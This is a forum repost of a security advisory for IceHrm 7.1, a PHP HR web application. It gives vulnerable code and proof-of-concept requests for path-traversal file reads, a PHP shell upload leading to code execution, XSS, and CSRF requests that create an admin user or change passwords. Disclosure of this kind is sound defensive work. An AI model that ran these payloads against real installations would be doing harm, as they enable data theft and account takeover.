Jump to content
Aerosol

IceHrm 7.1 - Multiple Vulnerabilities

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

IceHrm <=7.1 Multiple Vulnerabilities


Vendor: IceHRM
Product web page: http://www.icehrm.com
Affected version: <= 7.1


Summary: IceHrm is Human Resource Management web software
for small and medium sized organizations. The software is
written in PHP. It has community (free), commercial and
hosted (cloud) solution.

Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
including Local File Inclusion, Cross-Site Scripting, Malicious
File Upload, Cross-Site Request Forgery and Code Execution.

Tested on: Apache/2.2.15 (Unix)
           PHP/5.3.3
           MySQL 5.1.73


Vulnerabilities discovered by Stefan 'sm' Petrushevski
                              @zeroscience


Advisory ID: ZSL-2014-5215
Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php[/url]


01.12.2014

---


1. Local File Inclusion (LFI) 
#####################################################
File: 
app/index.php

Vulnerable code:
---- snip ----
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
app/?g=../&n=../../../../etc/passwd%00
---- snip ----

Proof of Concept (PoC):
[url]http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00[/url]

Severity:  CRITICAL
#####################################################


2. Local File Inclusion (LFI)
#####################################################
File:
service.php

Vulnerable code:
---- snip ----
if($action == 'download'){
    $fileName = $_REQUEST['file'];
    $fileName = CLIENT_BASE_PATH.'data/'.$fileName;
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($fileName));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($fileName));
    ob_clean();
    flush();
    readfile($fileName);
---- snip ----

Proof of Concept (PoC):
[url]http://zsltest/icehrm/app/service.php?a=download&file=../config.php[/url]

Severity:  CRITICAL
#####################################################


3. Malicious File Upload / Code Execution
#####################################################
File:
fileupload.php 

Vulnerable code:
---- snip ----
//Generate File Name
$saveFileName = $_POST['file_name'];
if(empty($saveFileName) || $saveFileName == "_NEW_"){
    $saveFileName = microtime();
    $saveFileName = str_replace(".", "-", $saveFileName);   
}

$file = new File();
$file->Load("name = ?",array($saveFileName));

// list of valid extensions, ex. array("jpeg", "xml", "bmp")

$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
// max file size in bytes
$sizeLimit =MAX_FILE_SIZE_KB * 1024;
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
// to pass data through iframe you will need to encode all html tags

if($result['success'] == 1){
    $file->name = $saveFileName;
    $file->filename = $result['filename'];
    $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
    $file->file_group = $_POST['file_group'];
    $file->Save();
    $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
    $result['data'] .= "|".$saveFileName;
    $result['data'] .= "|".$file->id;
}
---- snip ----

Proof of Concept (PoC) method:
1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
2. Create a malicious file (php shell) save it with .txt extension
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
4. Access the file – [url]http://zsltest/icehrm/data/dsadsa.php.txt[/url] to execute the php code.

PoC example:
1. [url]http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1[/url]
2. xxx.txt contents:
<?php phpinfo(); ?>
3. Upload the filename
4. Access the file:

Severity:  CRITICAL
#####################################################


4. Cross-Site Scripting (XSS)
#####################################################
File:
login.php

Vulnerable code:
---- snip ----
  <script type="text/javascript">
    var key = "";
  <?php if(isset($_REQUEST['key'])){?>
    key = '<?=$_REQUEST['key']?>';
    key = key.replace(/ /g,"+");
  <?php }?>
---- snip ----

Proof of Concept (PoC):
http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>

Severity:  MEDIUM
#####################################################


5. Cross-Site Scripting (XSS)
#####################################################
File:
fileupload_page.php

Vulnerable code:
---- snip ----
<div id="upload_form">
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file"  type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>

---- snip ----

Vulnerable parameters: id, file_group, user, msg

Proof of Concept (PoC):
[url]http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E[/url]

Severity:  MEDIUM
#####################################################


6. Information Disclosure / Leaking Sensitive User Info
#####################################################
Users’/employees’ profile images are easily accessible in the ‘data’ folder.

Proof of Concept (PoC):
[url]http://192.168.200.119/icehrm/app/data/profile_image_1.jpg[/url]
[url]http://192.168.200.119/icehrm/app/data/profile_image_X.jpg[/url] <- x=user id

Severity:  LOW
#####################################################


7. Cross-Site Request Forgery (CSRF)
#####################################################
All forms are vulnerable to CSRF.

Documents library:
[url]http://localhost/icehrm/app/service.php[/url]
POST 
document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument

Personal info:
[url]http://localhost/icehrm/app/service.php[/url]
GET 
t=Employee
a=ca
sa=get
mod=modules=employees
req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}

Add new admin user:
[url]http://localhost/icehrm/app/service.php[/url]
POST
username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User

Change password of user:
[url]http://localhost/icehrm/app/service.php?[/url]
GET
t=User
a=ca
sa=changePassword
mod=admin=users
req={"id":5,"pwd":"newpass"}

Add/edit modules:
[url]http://localhost/icehrm/app/service.php[/url]
POST
t=Module&a=get&sm=%7B%7D&ft=&ob=

Severity:  LOW
#####################################################

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...